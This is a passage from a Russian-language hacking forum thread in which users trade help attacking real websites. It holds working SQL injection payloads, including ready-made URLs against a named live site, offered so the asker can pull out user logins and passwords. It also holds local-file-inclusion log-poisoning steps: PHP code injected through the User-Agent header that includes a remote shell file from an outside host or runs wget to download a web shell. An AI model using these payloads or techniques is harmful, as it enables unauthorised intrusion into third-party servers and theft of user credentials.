Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Да делал я всё, делал. Перебирал до 20. Там вывод везде одинаковый, и только когда "union select 1,2,3" то вместо имён колонок ставит звёздочку.

    Спасибо, сейчас посмотрю
     
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    _iks_
    кинь сюда ссылку или в ЛС, так быстрее будет!
     
  3. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    немогу с одной уязвимостью разобратся..

    Делаю>

    Когда делаю вот так>

    Пробовал разные методы с UNION SELECT и нечего не найду, делаю такой запрос
    и все время выходит
    Подскажите пожалуйста что делать...

    я знаю что там
    DB Server:MySQL >=5
     
    _________________________
    #11223 Дирижабль, 30 Jan 2010
    Last edited: 30 Jan 2010
  4. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Выводи инфу в ошибку

    pid=119402381+or(1,1)=(select+count(0),concat((select+database()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+

     
    2 people like this.
  5. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    86
    Likes Received:
    13
    Reputations:
    2
    Помогите,имеется сайт http:/ /www.ollis.ru/ ,там на каждой странице при кавычке ошибка такая:
    SELECT * FROM _prop WHERE obj_type='block_page' and obj_id IN ('1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')' at line 1
    SELECT * FROM _prop WHERE obj_type='html_page' and obj_id IN ('block_page1'') - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''block_page1'')' at line 1

    Как не пробовал вытащить информацию(пробовал order by, union select),никак не получается!Помогите как вытаскивать?
    Знаю что база 5.0.22
     
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    http://www.ollis.ru/index.php?id=cabinet')+order+by+7%23&type=cabinet&action=lost_pw&mode=return_from_hidden


    http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Select+Name_Const(version(),1),Name_Const(version(),1))a)%23&type=cabinet&action=lost_pw&mode=return_from_hidden


     
    _________________________
    #11226 HAXTA4OK, 30 Jan 2010
    Last edited: 30 Jan 2010
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    86
    Likes Received:
    13
    Reputations:
    2
    HAXTA4OK - Вот что значит мастер!Спасибо,я целый день мучаюсь)
     
  8. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    у меня такая проблема...
    есть lfi, на сайте стоит freebsd...
    найшол по конфигу путь к логам:
    /var/log/httpd-access.log
    /var/log/httpd-error.log
    как дальше правильно в них проинклудить шелл?
     
  9. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://site.ru/?<?php system('ls');exit; ?>&cmd=ls
    Потом инклудь логи...
     
  10. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ну там еще можно в юзер агент впихнуть типа
    <?php include('http://supervasyahacker.com/supershell.txt'); ?>
    но тут еще одна проблемка логи ведутся там с 2006 года и грузятся туеву хучу времени...
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Я привел пример. Ну вот и жди это туеву хучу времени, иначе - никак.
     
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    вообщем присмотрелся я к логам и там вообще кроме 2006 года нету записей...
    сложилось такое впечатление что сам файл присутствует, читать его можно но запись в него больше неведется:(
    может ли такое быть?...
     
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204

    1. Да, может.
    2. Вызываемые ресурсы могут быть ограничены.
    3. Может у тебя не LFI, не в тот лог пишешь, какая-то фильтрация.
    4. Вообще как бы скрипт выполняется при загрузке сразу же! Т.е. если знать сразу пути и права, то выполнив system(cd /home/777; wget http://shellsite.com/shell.txt -O shell.php); то можно не ждать конца загрузки логов.
     
  14. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    86
    Likes Received:
    13
    Reputations:
    2
    И напоследок,как вытащить логины да пароли?)Ради чего и задавал вопрос.Самому не получается.
     
  15. emirate

    emirate New Member

    Joined:
    2 Jan 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Народ подскажите. Есть сайт, есть sql-injection при таком запросе
    -11+UNION+SELECT+1,2,3,4,5,6/* выводит числа 3 и 6 когда подставляю строковые данные ну например version() или любое другое слово выбивает ошибку подскажите что можно сделать с таким сайтом
     
  16. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    омг, какой раз уже писалось =\
    unhex(hex(version()))

    _http://forum.antichat.ru/thread104591.html , см Вопрос №2
     
  17. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    там я смотрю в логах меня даже и нету,это при всем том што сам код я уже впихнул темболее в юзер-агент, он обязан там был засветится... хммм странно может и правда ограничения какието по выводу например содержимого лога? там только я видел за 2006 год и все...
    вот вырезка с верхушки лога:

    .145.194.221 - - [17/Oct/2006:20:33:55 +0300] "GET /subjects/63/svit-vit-kult/L_3.htm HTTP/1.1" 404 313 "http://www.google.com/search?q=%D1%80%D0%B5%D0%BD%D0%B5%D1%81%D0%B0%D0%BD%D1%81%D0%BD%D0%B8%D0%B9+%D0%BD%D0%B5%D0%BE%D0%BF%D0%BB%D0%B0%D1%82%D0%BE%D0%BD%D1%96%D0%B7%D0%BC&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&hl=ru" "Mozilla/5.0 (X11; U; Linux i686; en; rv:1.8.0.7) Gecko/20061010 Epiphany/2.16 Firefox/1.5.0.7" 74.6.72.174 - - [17/Oct/2006:20:34:13 +0300] "GET /labrary/Temat_rozpod_vir_lib/S01-04/library$/Fisiol_%F0%EE%F1/directory.djvu HTTP/1.0" 404 350 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us
    а делаю я так:
    через тампер дату в юзер агент пишу
    <?php include('http://site.ru/shell.txt'); ?>
    затем сразу обращаюсь к логу
    http://www.site.ua/php1/index.php?page=../../../../../../var/log/httpd-access.log
     
  18. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    86
    Likes Received:
    13
    Reputations:
    2
    Как из этих кусков логины и пароли вынести?

    http://www.ollis.ru/index.php?id=cabinet')+order+by+7%23&type=cabinet&action=lost_pw&mode=return_from_hidden


    http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Select+Name_Const(version(),1),Name_Const(version(),1) )a)%23&type=cabinet&action=lost_pw&mode=return_from_hidden
     
  19. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Определять название БД, колонки. Выводить их оттуда. Об этом есть немало статтей.
     
  20. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    скул есть это уж точно и поле тоже тока 1, но может я что то не догнал, больше никак не могу раскрутит.
    Можеть посоветуете с методами
     
Loading...
Thread Status:
Not open for further replies.